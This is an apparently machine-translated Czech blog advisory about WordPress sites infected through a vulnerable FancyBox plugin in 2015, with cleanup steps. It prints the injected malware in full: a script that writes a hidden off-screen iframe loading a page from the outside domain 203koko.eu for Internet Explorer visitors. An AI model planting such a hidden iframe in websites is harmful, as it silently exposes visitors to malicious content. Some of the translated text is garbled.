Začátkem týdne vznikla série stránek a blogů s WordPress, obdrželi varování malwarová infekce přes Webmasteři Google.
Problém ke kterému Webmasteři Google odkazuje na přítomnost a treska / skript malware iframe na zdrojových webových stránkách.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Zdá se, že jde o a zranitelnost A pluginAcquisFancyBox pro WordPress který do včerejška (05.02.2015) nebyl delší dobu aktualizován.
Řešení tohoto problému a dezinfekce virových míst s tímto malwarem je to poměrně jednoduché.
1. Deaktivujte plugin FancyBox.
2. Odstraňte všechny soubory pluginu FancyBox ze serveru (přes FTP)
3. Nainstalujte novou verzi pluginu (FancyBox 3.0.4)
FancyBox pro WordPress 3.0.4
– Přejmenováno nastavení ovlivněné bezpečnostním problémem uvedeným v 3.0.3. To by mělo zastavit zobrazování škodlivého kódu na stránkách, kde je plugin aktualizován, aniž by byl škodlivý kód odstraněn.
FancyBox pro WordPress 3.0.3
– Opraven bezpečnostní problém.
Informace o malwaru:
TYPE: Přesměrování iframe
CÍL: WordPress Fancybox
MALWARE DOMÉNA: 203koko.eu
URI MALWARE: http://203koko.eu/hjnfh/ipframe2.php
RAW KÓD MALWARU: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” šířka=”20″ výška =”30″ ></iframe>
Skript MALWARE: <skript>if (navigator.userAgent.match(/msie/i)) { document.write(‘ <div styl=”position:absolute;left:-2000px;width:2000px”>
Odstraňte malware ze svého webu WordPress.
